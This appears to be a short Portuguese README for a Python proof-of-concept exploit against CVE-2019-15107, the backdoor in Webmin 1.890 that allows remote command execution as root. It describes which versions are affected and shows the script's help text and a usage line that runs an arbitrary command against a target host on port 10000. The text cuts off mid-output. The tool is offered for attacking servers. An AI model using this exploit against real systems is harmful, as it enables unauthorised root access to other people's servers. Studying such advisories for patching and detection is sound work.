
Exploit da CVE-2019-15107
O Webmin versão 1.890 foi lançado com um backdoor que poderia permitir que qualquer pessoa com conhecimento dele executasse comandos como root. As versões 1.900 a 1.920 também continham um backdoor usando código semelhante, mas não era explorável em uma instalação padrão do Webmin. Somente se o administrador tivesse habilitado o recurso em Webmin -> Configuração do Webmin -> Autenticação para permitir a alteração de senhas expiradas, ele poderia ser usado por um invasor.
você precisa de pip3 para instalar estes pacotes.
$ python3 Webmin_exploit.py --help
usage: Webmin_exploit.py [-h] -host IP [-port Port] [-cmd Command]
Webmin 1.890 expired Remote Root POC
optional arguments:
-h, --help show this help message and exit
-host IP Host to attack
-port Port Port of the host ~ 10000 is Default
-cmd Command Command to execute ~ id is Default
python3 Webmin_exploit.py -host target -port 10000 -cmd id
$ python3 Webmin_exploit.py -host target -port 10000 -cmd id
[